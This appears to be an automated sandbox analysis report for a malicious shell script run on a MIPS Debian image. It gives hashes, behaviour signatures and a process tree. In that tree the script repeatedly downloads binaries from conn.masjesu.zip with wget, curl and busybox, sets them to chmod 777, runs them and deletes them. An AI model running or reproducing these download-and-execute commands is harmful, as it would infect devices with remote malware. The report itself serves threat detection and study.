Analysis
-
max time kernel
101s -
max time network
104s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/10/2024, 01:29
Static task
static1
Behavioral task
behavioral1
Sample
88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh
-
Size
10KB
-
MD5
4df258afac082c765345136687fdb240
-
SHA1
0cdbf5333864ea193e81b258a488b509df0bed0a
-
SHA256
88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc
-
SHA512
ad97012e97547376dc1525f12c378e6cf8a864ec108266cc9a8875ae99b65a8a68eca912a1175e43584f1298bee6471c7c67d8f8af9416a5847fdaf39894ad5e
-
SSDEEP
192:FhU03aGPwo229c4kQMNyqJOpsxl47T/U03aGzm229csyxl47TfQMNyqI:FaOkQMNyqJOpsxl47Toyxl47TfQMNyqI
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description: File opened for reading; ioc: /proc/sys/crypto/fips_enabled; Process: curl
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh/tmp/88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh1⤵PID:719
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- System Network Configuration Discovery
PID:725
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:753
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- System Network Configuration Discovery
PID:754
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- System Network Configuration Discovery
PID:777
-
-
/bin/chmodchmod 777 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK./zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:805
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- System Network Configuration Discovery
PID:806
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod 777 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO./81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:825
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- System Network Configuration Discovery
PID:826
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- System Network Configuration Discovery
PID:841
-
-
/bin/chmodchmod 777 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe./rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c./nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W./OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:874
-
-
/bin/chmodchmod 777 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu./HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:876
-
-
/bin/rmrm HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr./hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a./AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC./3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵PID:906
-
-
/bin/chmodchmod 777 phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1./phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:908
-
-
/bin/rmrm phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh./NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG./VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP./YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- System Network Configuration Discovery
PID:937
-
-
/bin/chmodchmod 777 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe./rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:945
-
-
/bin/chmodchmod 777 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c./nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- System Network Configuration Discovery
PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:953
-
-
/bin/chmodchmod 777 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W./OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/chmodchmod 777 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu./HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- System Network Configuration Discovery
PID:966
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- System Network Configuration Discovery
PID:969
-
-
/bin/chmodchmod 777 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO./81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:973
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:974
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:977
-
-
/bin/chmodchmod 777 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr./hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- System Network Configuration Discovery
PID:985
-
-
/bin/chmodchmod 777 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a./AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:989
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵PID:990
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:993
-
-
/bin/chmodchmod 777 phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1./phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:995
-
-
/bin/rmrm phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh./NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:1005
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- System Network Configuration Discovery
PID:1006
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1007
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- System Network Configuration Discovery
PID:1009
-
-
/bin/chmodchmod 777 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG./VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:1012
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:1013
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1014
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:1016
-
-
/bin/chmodchmod 777 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- File and Directory Permissions Modification
PID:1017
-
-
/tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP./YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Executes dropped EXE
PID:1018
-
-
/bin/rmrm YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:1020
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:1021
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1022
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- System Network Configuration Discovery
PID:1024
-
-
/bin/chmodchmod 777 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- File and Directory Permissions Modification
PID:1025
-
-
/tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC./3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Executes dropped EXE
PID:1026
-
-
/bin/rmrm 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:1027
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:1028
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1029
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- System Network Configuration Discovery
PID:1031
-
-
/bin/chmodchmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- File and Directory Permissions Modification
PID:1032
-
-
/tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Executes dropped EXE
PID:1033
-
-
/bin/rmrm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:1034
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:1035
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1036
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- System Network Configuration Discovery
PID:1038
-
-
/bin/chmodchmod 777 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- File and Directory Permissions Modification
PID:1039
-
-
